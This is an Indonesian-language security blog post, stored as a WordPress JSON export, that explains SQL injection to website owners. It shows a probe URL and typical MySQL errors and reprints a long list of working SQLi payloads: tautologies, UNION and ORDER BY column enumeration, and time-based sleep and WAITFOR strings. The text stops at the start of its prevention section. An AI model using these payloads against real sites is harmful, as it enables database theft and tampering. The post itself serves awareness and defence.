{"id":77700,"date":"2025-06-23T10:41:15","date_gmt":"2025-06-23T03:41:15","guid":{"rendered":"https:\/\/www.wowrack.com\/?p=77700"},"modified":"2026-03-25T10:27:14","modified_gmt":"2026-03-25T03:27:14","slug":"sql-injection-adalah-ancaman-kenali-cara-mencegah","status":"publish","type":"post","link":"https:\/\/www.wowrack.com\/id-id\/blog\/security-id\/sql-injection-adalah-ancaman-kenali-cara-mencegah\/","title":{"rendered":"SQL Injection Adalah Ancaman: Kenali & Cara Mencegah"},"content":{"rendered":"

Semakin pesat perkembangan teknologi maka akan sebanding lurus dengan kejahatan siber, Setiap pemilik website harus waspada terhadap salah satu kejahatan siber yang paling ditakutkan yaitu <\/span>SQL Injection<\/b>.\u00a0<\/span><\/p>\n

Tentu Anda pernah mendengar hacker terkenal bernama Bjorka, Karena dia membuat semua mata berfokus pada kejahatannya, oleh sebab itu jika website perusahaan Anda tidak dijaga dengan baik, datanya bisa dicuri oleh para kelompok yang tidak bertanggung jawab seperti Byorka.\u00a0<\/span><\/p>\n

Perlu Anda ketahui, bahwa SQL Injection adalah salah satu celah yang bisa digunakan orang tidak bertanggung jawab untuk mencuri data website perusahaan.<\/span><\/p>\n

For your information<\/span><\/i> bahwa <\/span>OWASP (Open Web Application Security Project)<\/b> yang merupakan organisasi keamanan siber dunia bahkan menempatkan serangan SQL Injection di posisi ketiga sebagai ancaman paling berisiko untuk website.\u00a0<\/span><\/p>\n

Maka dari itu, sebagai pemilik website maupun pemilik bisnis harus paham apa itu SQL Injection<\/strong> selanjutnya bagaimana cara kerja dan cara mencegahnya.<\/span><\/p>\n

Apa itu SQL Injection<\/strong><\/h2>\n

SQL Injection adalah bentuk celah keamanan (vulnerability<\/i><\/a>) paling berbahaya pada website. Serangan ini bisa dengan mudah terjadi jika peretas memasukan kode SQL (Structured Query Language) ke dalam input database yang tidak difilter dengan baik.<\/p>\n

Contoh kode : https:\/\/namawebsite.com\/index.php?name=123\u2019<\/strong><\/p>\n

Kode ini jika dijalankan di url, maka akan terjadi error pada database seperti muncul kode error :\u00a0<\/span><\/p>\n

\u201cYou have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \u2018\u2018VALUE\u2019\u2019.<\/b><\/p>\n

\u201cYou have an error in your SQL syntax\u201d<\/b><\/p>\n

\u201cUnclosed quotation mark\u201d<\/b>
\n<\/b><\/p>\n

\u201cSQLSTATE[HY000]\u201d<\/b><\/p>\n

\"SQL<\/p>\n

sumber geeks for geeks<\/p>\n

Jika ini terjadi, maka peretas bisa mengakses database yang berisi username dan password untuk login ke website Anda.<\/span><\/p>\n

Cara menggunakan SQLi ini menggunakan celah coding database yang buruk, penyerang bisa melakukan SQLi hanya dengan satu input sederhana seperti menggunakan \u2018 pada akhir query database.\u00a0<\/span><\/p>\n

Serangan SQL injection banyak dilakukan oleh cracker, berbeda dari hacker yang tujuannya membobol sistem guna memberitahu pemilik website jika ada celah keamanan, namun bagi cracker kebocoran ini akan di manfaatkan untuk tujuan ilegal.\u00a0<\/span><\/p>\n

SQL Injection Payloads<\/strong><\/h2>\n

SQL Injection Payload<\/b> merupakan sekumpulan sintaks sederhana yang dibuat untuk mengeksploitasi kelemahan database. SQLi Payload bekerja dengan cara menyisipkan potongan kode ke dalam input url website yang sedang mengambil data dari database. Jika website Anda bocor, sintaks ini akan dijalankan database dan menghasilkan error.<\/span><\/p>\n

Jika error, maka melalui URL tersebut, penyerang bisa mendapatkan celah lalu mencuri isi dari database.<\/span><\/p>\n

Sintaks SQLi payload sangat sederhana, antara lain<\/strong><\/p>\n

'<\/span><\/p>\n

''<\/span><\/p>\n

`<\/span><\/p>\n

``<\/span><\/p>\n

,<\/span><\/p>\n

\"<\/span><\/p>\n

\"\"<\/span><\/p>\n

\/<\/span><\/p>\n

\/\/<\/span><\/p>\n

\\<\/span><\/p>\n

\\\\<\/span><\/p>\n

;<\/span><\/p>\n

' or \"<\/span><\/p>\n

-- or #\u00a0<\/span><\/p>\n

' OR '1<\/span><\/p>\n

' OR 1 -- -<\/span><\/p>\n

\" OR \"\" = \"<\/span><\/p>\n

\" OR 1 = 1 -- -<\/span><\/p>\n

' OR '' = '<\/span><\/p>\n

'='<\/span><\/p>\n

'LIKE'<\/span><\/p>\n

'=0--+<\/span><\/p>\n

\u00a0OR 1=1<\/span><\/p>\n

' OR 'x'='x<\/span><\/p>\n

' AND id IS NULL; --<\/span><\/p>\n

'''''''''''''UNION SELECT '2<\/span><\/p>\n

%00<\/span><\/p>\n

\/*\u2026*\/\u00a0<\/span><\/p>\n

+<\/span> addition, concatenate (or space in url)<\/span><\/p>\n

||<\/span> (double pipe) concatenate<\/span><\/p>\n

%<\/span> wildcard attribute indicator<\/span><\/p>\n

 <\/p>\n

@variable<\/span> local variable<\/span><\/p>\n

@@variable<\/span> global variable<\/span><\/p>\n

 <\/p>\n

# Numeric<\/span><\/p>\n

AND 1<\/span><\/p>\n

AND 0<\/span><\/p>\n

AND true<\/span><\/p>\n

AND false<\/span><\/p>\n

1-false<\/span><\/p>\n

1-true<\/span><\/p>\n

1*56<\/span><\/p>\n

-2<\/span><\/p>\n

 <\/p>\n

1' ORDER BY 1--+<\/span><\/p>\n

1' ORDER BY 2--+<\/span><\/p>\n

1' ORDER BY 3--+<\/span><\/p>\n

 <\/p>\n

1' ORDER BY 1,2--+<\/span><\/p>\n

1' ORDER BY 1,2,3--+<\/span><\/p>\n

 <\/p>\n

1' GROUP BY 1,2,--+<\/span><\/p>\n

1' GROUP BY 1,2,3--+<\/span><\/p>\n

' GROUP BY columnnames having 1=1 --<\/span><\/p>\n

 <\/p>\n

-1' UNION SELECT 1,2,3--+<\/span><\/p>\n

' UNION SELECT sum(columnname ) from tablename --<\/span><\/p>\n

 <\/p>\n

-1 UNION SELECT 1 INTO @,@<\/span><\/p>\n

-1 UNION SELECT 1 INTO @,@,@<\/span><\/p>\n

 <\/p>\n

1 AND (SELECT * FROM Users) = 1<\/span><\/p>\n

 <\/p>\n

' AND MID(VERSION(),1,1) = '5';<\/span><\/p>\n

 <\/p>\n

' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') --<\/span><\/p>\n

 <\/p>\n

Finding the table name<\/span><\/p>\n

 <\/p>\n

Time-Based:<\/span><\/p>\n

,(select * from (select(sleep(10)))a)<\/span><\/p>\n

%2c(select%20*%20from%20(select(sleep(10)))a)<\/span><\/p>\n

';WAITFOR DELAY '0:0:30'--<\/span><\/p>\n

 <\/p>\n

Comments:<\/span><\/p>\n

 <\/p>\n

#<\/span> \u00a0 \u00a0 Hash comment<\/span><\/p>\n

\/*\u00a0 <\/span> C-style comment<\/span><\/p>\n

-- -<\/span> SQL comment<\/span><\/p>\n

;%00<\/span> Nullbyte<\/span><\/p>\n

`<\/span> \u00a0 \u00a0 Backtick<\/span><\/p>\n

Sumber github<\/a><\/span><\/p>\n

 <\/p>\n

Bahaya dan Dampaknya<\/b><\/h3>\n

Jika payload dijalankan sukses, penyerang bisa mengakses dan mendapatkan hal hal dibawah ini<\/span><\/p>\n

    \n
  1. Membaca data pengguna<\/span><\/li>\n
  2. Mengubah isi dari database<\/span><\/li>\n
  3. Menghapus tabel atau semua isi dari database<\/span><\/li>\n
  4. Mengeksploitasi server (privilege escalation)<\/span><\/li>\n
  5. Mengambil akses website<\/span><\/li>\n<\/ol>\n

    Cara Mencegah dan Mengatasi<\/strong><\/h2>\n

    Sebelum terjadinya kebocoran database, Anda bisa memitigasi website dengan cara\u00a0<\/span><\/p>\n